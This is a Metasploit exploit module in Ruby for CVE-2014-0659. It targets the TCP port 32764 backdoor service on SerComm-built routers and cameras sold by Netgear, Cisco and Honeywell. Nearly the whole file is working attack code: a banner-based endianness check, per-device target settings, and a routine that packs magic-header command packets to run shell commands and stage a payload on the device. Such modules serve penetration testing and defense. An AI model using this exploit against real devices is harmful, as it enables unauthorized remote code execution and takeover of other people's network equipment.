rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/misc/sercomm_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
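class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  # First field of every request sent to the service on RPORT. Packed with the
  # target's PackFormat it is the same four bytes the service answers with as a
  # banner ("MMcS" or "ScMM"), which is what check/endian_fingerprint key on.
  BACKDOOR_MAGIC = 0x53634d4d

  # Request type used by execute_command ("run a shell command").
  CMD_EXEC = 0x07

  # Banner prefixes: "MMcS" was seen on big-endian devices, "ScMM" on little-endian.
  BANNER_BE = "MMcS"
  BANNER_LE = "ScMM"

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "SerComm Device Remote Code Execution",
        'Description' => %q{
          This module will cause remote code execution on several SerComm devices.
          These devices typically include routers from NetGear and Linksys.
          This module was tested successfully against several NetGear, Honeywell
          and Cisco devices.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
        ],
        'Payload' => {
          'Space' => 10000, # Could be more, but this should be good enough
          'DisableNops' => true
        },
        'Platform' => 'linux',
        'Privileged' => false,
        # Per-target settings read by #exploit: 'PackFormat' is the pack()
        # template for the request header (a per-target value, not derived
        # from the architecture), 'NoArgs'/'UploadPath'/'PayloadEncode' are
        # handed to the command stager. The two "Manual" targets take these
        # from the advanced options instead.
        'Targets' => [
          [
            'Generic Linux MIPS Big Endian',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV'
            }
          ],
          [
            'Generic Linux MIPS Little Endian',
            {
              'Arch' => ARCH_MIPSLE,
              'PackFormat' => 'NNN'
            }
          ],
          [
            'Manual Linux MIPS Big Endian',
            {
              'Arch' => ARCH_MIPSBE
            }
          ],
          [
            'Manual Linux MIPS Little Endian',
            {
              'Arch' => ARCH_MIPSLE
            }
          ],
          [
            'Cisco WAP4410N',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'NNN'
            }
          ],
          [
            'Honeywell WAP-PL2 IP Camera',
            {
              'Arch' => ARCH_MIPSLE,
              'PackFormat' => 'VVV'
            }
          ],
          [
            'Netgear DG834',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs' => true
            }
          ],
          [
            'Netgear DG834G',
            {
              'Arch' => ARCH_MIPSLE,
              'PackFormat' => 'VVV',
              'PayloadEncode' => 'octal'
            }
          ],
          [
            'Netgear DG834PN',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs' => true
            }
          ],
          [
            'Netgear DGN1000',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs' => true
            }
          ],
          [
            'Netgear DSG835',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs' => true
            }
          ],
          [
            'Netgear WPNT834',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'NNN',
              'UploadPath' => '/var',
              'PayloadEncode' => 'octal'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'References' => [
          [ 'CVE', '2014-0659' ],
          [ 'OSVDB', '101653' ],
          [ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
        ],
        'DisclosureDate' => '2013-12-31',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(32764)
      ]
    )

    # Only consulted for the "Manual ..." targets; every other target carries
    # the equivalent values in its target hash.
    register_advanced_options(
      [
        OptEnum.new('PACKFORMAT', [false, "Pack Format to use", 'VVV', ['VVV', 'NNN']]),
        OptString.new('UPLOADPATH', [false, "Remote path to land the payload", "/tmp" ]),
        OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),
        OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']])
      ]
    )
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  # Probe RPORT and report whether the service answered with a known banner.
  #
  # The probe is a single connection carrying 5 random bytes, so it is visible
  # to the device's connection logging like any other client.
  #
  # @return [Msf::Exploit::CheckCode] Appears when a known banner was read;
  #   Unknown when the service could not be reached (an unreachable host says
  #   nothing about the device, so it is no longer reported as Safe); Safe when
  #   the service answered with something else or nothing.
  def check
    begin
      endianness = banner_endianness(read_banner)
    rescue Rex::ConnectionError => e
      print_error("Connection failed: #{e.class}: #{e}")
      return Msf::Exploit::CheckCode::Unknown
    end

    case endianness
    when 'BE'
      vprint_status("Detected Big Endian")
      Msf::Exploit::CheckCode::Appears
    when 'LE'
      vprint_status("Detected Little Endian")
      Msf::Exploit::CheckCode::Appears
    else
      Msf::Exploit::CheckCode::Safe
    end
  end

  # Pick the stager settings for the selected target, then run the command
  # stager, which calls #execute_command once per command line.
  #
  # Manual targets read NOARGS/UPLOADPATH/ENCODING/PACKFORMAT from the
  # advanced options; all others read the matching keys from the target hash
  # (missing keys yield nil and are passed through to the stager unchanged).
  def exploit
    if manual_target?
      print_warning("Remember you can configure Manual targets with NOARGS, UPLOADPATH, ENCODING and PACKFORMAT advanced options")
      @no_args = datastore['NOARGS']
      @upload_path = datastore['UPLOADPATH']
      @encoding_format = datastore['ENCODING']
      @pack_format = datastore['PACKFORMAT']
    else
      @no_args = target['NoArgs']
      @upload_path = target['UploadPath']
      @encoding_format = target['PayloadEncode']
      @pack_format = target['PackFormat']
    end

    execute_cmdstager(
      noargs: @no_args,
      temp: @upload_path,
      enc_format: @encoding_format,
      flavor: :echo
    )
  end

  # Byte order implied by the service banner.
  #
  # @return [String, nil] 'BE', 'LE', or nil when the banner is absent or
  #   unrecognised; a connection failure is printed and also yields nil.
  def endian_fingerprint
    banner_endianness(read_banner)
  rescue Rex::ConnectionError => e
    print_error("Connection failed: #{e.class}: #{e}")
    nil
  end

  # CmdStager callback: deliver one command line to the service.
  #
  # @param cmd [String] command text, sent verbatim after the request header
  # @param opts [Hash] stager options (not used by this transport)
  def execute_command(cmd, opts)
    # Header: magic, request type, then the number of bytes that follow.
    # bytesize rather than length, since the trailing text goes out as raw
    # bytes and the two differ for any non-ASCII command.
    header = [BACKDOOR_MAGIC, CMD_EXEC, cmd.bytesize].pack(@pack_format)

    connect
    begin
      sock.put(header + cmd)
    ensure
      # Close even when the write raises, so a failed chunk does not leak the socket.
      disconnect
    end

    # Pause between consecutive commands (value kept from the original;
    # presumably gives the device time to act before the next line arrives).
    Rex.sleep(1)
  end

  private

  # True for the two "Manual ..." targets, which are configured via advanced options.
  def manual_target?
    target.name.match?(/Manual/)
  end

  # Connect, send a 5-byte random probe and return whatever the service writes
  # back (nil if nothing is read). The socket is closed on every path after a
  # successful connect.
  #
  # @raise [Rex::ConnectionError] when the connection cannot be established
  def read_banner
    connect
    begin
      sock.put(rand_text(5))
      sock.get_once
    ensure
      disconnect
    end
  end

  # Classify a banner by its leading four bytes.
  #
  # @param banner [String, nil]
  # @return [String, nil] 'BE' for "MMcS", 'LE' for "ScMM", nil otherwise
  def banner_endianness(banner)
    return nil unless banner
    return 'BE' if banner.start_with?(BANNER_BE)
    return 'LE' if banner.start_with?(BANNER_LE)

    nil
  end
end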